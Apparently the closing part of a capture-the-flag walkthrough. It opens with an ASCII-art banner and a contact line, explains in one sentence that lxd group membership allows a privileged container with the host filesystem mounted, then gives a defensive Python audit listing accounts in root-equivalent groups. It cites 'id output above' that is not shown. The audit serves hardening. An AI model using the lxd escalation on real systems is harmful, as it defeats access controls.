░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░░▄▌████████▄▄▄███████▌░░░░░▄
░▄▀░██████████████████▌▀▄░░░░
▀░░░█████▀▀░░░▀███████░░░▀▄░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░

invite-me: linkedin.com/in/eliastouguinho
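The `id` output above is the whole finding: membership in lxd lets a user start a privileged container with the host's / mounted inside it, so lxd membership is root membership by another name. As an added example, not part of the original walkthrough, the following audit parses /etc/group and /etc/passwd and lists every account in a root-equivalent group. It goes beyond grepping the lxd: line by also catching accounts whose primary GID (set in /etc/passwd) is such a group, which never appear in /etc/group. The sample lines are constructed, modelled on the id output above; the svc_build account is invented to show the primary-GID case.

```python
"""Audit group memberships that are root-equivalent on a Linux host.

Added example for this walkthrough, not part of the box. The sample /etc/group
and /etc/passwd content is constructed (modelled on the id output above); the
svc_build account is invented to show the primary-GID case.
"""
from collections import defaultdict

# Groups whose membership is effectively root ("high") or merely sensitive ("info").
# lxd is high: a member can launch a privileged container with the host's /
# mounted inside it, exactly the sequence shown in this walkthrough.
SENSITIVE_GROUPS = {
    "lxd": ("high", "privileged container with host filesystem mounted"),
    "docker": ("high", "privileged container with host filesystem mounted"),
    "disk": ("high", "raw read/write of block devices, including /"),
    "shadow": ("high", "read access to password hashes"),
    "sudo": ("high", "sudo policy typically grants full root"),
    "wheel": ("high", "sudo policy typically grants full root"),
    "adm": ("info", "read access to system logs"),
}

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,hackable_3
sudo:x:27:
lxd:x:116:hackable_3
hackable_3:x:1000:
jubiscleudo:x:1001:
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash
jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash
svc_build:x:1002:116:build service (constructed):/home/svc_build:/bin/bash
"""


def parse_group(text: str) -> dict:
    """name -> (gid, [secondary members]) from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), [m for m in members.split(",") if m])
    return groups


def memberships(group_text: str, passwd_text: str) -> dict:
    """user -> set of group names, merging secondary membership (group file)
    with primary membership (the gid field of /etc/passwd)."""
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    result = defaultdict(set)
    for name, (_gid, members) in groups.items():
        for user in members:
            result[user].add(name)
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        user, _pw, _uid, gid = line.split(":", 4)[:4]
        primary = gid_to_name.get(int(gid))
        if primary:
            result[user].add(primary)
    return result


def audit(group_text: str, passwd_text: str, severity: str = "high") -> dict:
    """user -> sorted list of sensitive groups at the given severity."""
    findings = {}
    for user, names in memberships(group_text, passwd_text).items():
        hits = sorted(g for g in names if SENSITIVE_GROUPS.get(g, ("",))[0] == severity)
        if hits:
            findings[user] = hits
    return findings


if __name__ == "__main__":
    for user, groups in sorted(audit(SAMPLE_GROUP, SAMPLE_PASSWD).items()):
        for g in groups:
            print(f"{user}: member of {g}: {SENSITIVE_GROUPS[g][1]}")
```

On a real host, feed it the contents of /etc/group and /etc/passwd; any non-administrator it lists under lxd or docker should be removed from that group, since no container configuration setting on the user side compensates for the membership itself.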
